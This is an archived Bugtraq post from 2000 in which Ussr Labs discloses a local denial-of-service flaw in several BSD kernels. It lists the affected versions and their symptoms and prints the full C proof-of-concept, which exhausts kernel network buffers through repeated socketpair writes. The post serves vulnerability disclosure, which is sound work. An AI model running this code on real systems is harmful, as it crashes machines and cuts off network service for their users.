Bugtraq mailing list archives
Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability
From: labs () USSRBACK COM (Ussr Labs)
Date: Wed, 2 Aug 2000 08:41:53 -0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability Release Date: April 29, 2000 Systems Affected: FreeBSD 3.3-RELEASE FreeBSD 4.0-RELEASE FreeBSD 5.0 (maybe) Openbsd 2.5 Openbsd 2.6 Openbsd 2.7 (maybe) NetBSD 1.4.1 THE PROBLEM - From an original posting made about last September by Sven Berkenvs (sven () ILSE NL) to bugtraq: - --- Forward --- I stumbled across a denial of service attack on FreeBSD systems, where an unpriviledged user can panic the kernel. Quick and dirty testing (code attached at the end of this mail) showed OpenBSD is vulnerable too: FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it on older FreeBSD versions. OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192: The kernel logs one "/bsd: mb_map full" and all processes trying to send something over the network get stuck waiting in mbuf. Locally the system continues to function. Tested by a friend. NetBSD: Not available, but it is highly probable that the affected code in OpenBSD is from its parent NetBSD. - --- End of Forward --- Upon testing this code on the new versions of *bsd the exploit still works. FreeBSD - 3.3-RELEASE: reboots the pc FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs recieves /kernel: xl0: no memory for rx list -- packet dropped! All network connection is dead and the route table is a mess. FreeBSD - 5.0-Current: Untested Openbsd - 2.5 (with NMBCLUSTERS=8192): mb_map full Openbsd - 2.6 (with patches up to May 25, 2000): mb_map full Openbsd - 2.7: Untested NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase NMBCLUS The network connection is dead. NetBSD - 1.4.2: Untested - From what I have tested on, Linux does not have any issue with this piece of code. As for the other unices, they have not been tested. THE CODE The original code written by Sven Berkenvs that causes this: #include <unistd.h> #include <sys/socket.h> #include <fcntl.h> #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } Underground Security Systems Research http://www.ussrback.com Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN, Sub, prizm, b0f,Technotronic and Rfp. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Feedback: Please send suggestions, updates, and comments to: Underground Security Systems Research mail:labs () ussrback com http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com> iQA/AwUBOYgJAK3JcbWNj6DDEQJNMQCgzvEMALCmfNJ9EpPVF1uRNFiniC8AoKsV ucQIKYXTFMT6TzTx3JNHVw0L =LDeL -----END PGP SIGNATURE-----
Current thread:
- Re: IBM HTTP SERVER / APACHE typo () INFERNO TUSCULUM EDU (Jun 01)
- <Possible follow-ups>
- Re: IBM HTTP SERVER / APACHE H D Moore (Jun 01)
- Re: IBM HTTP SERVER / APACHE Luke Harless (Jun 01)
- Security Administration comes to LISA 2000 Cat Okita (Jun 01)
- Remote DoS attack in RealServer: USSR-2000043 David Cotter (Jun 01)
- ipx storm Jacek Lipkowski (Jun 02)
- Microsoft Security Bulletin (MS00-032) Microsoft Product Security (Jun 02)
- Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability Ussr Labs (Aug 02)
- Piranha password file frostman () SECUREACCESS INTRANETS COM (Jun 02)
- Re: Piranha password file arkth (Jun 08)
- Re: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability Alfred Perlstein (Jun 02)
- New Allaire Security Zone Bulletins Aleph One (Jun 08)
- Re: IBM HTTP SERVER / APACHE . Hecix (Jun 02)
- Re: IBM HTTP SERVER / APACHE Marc Slemko (Jun 03)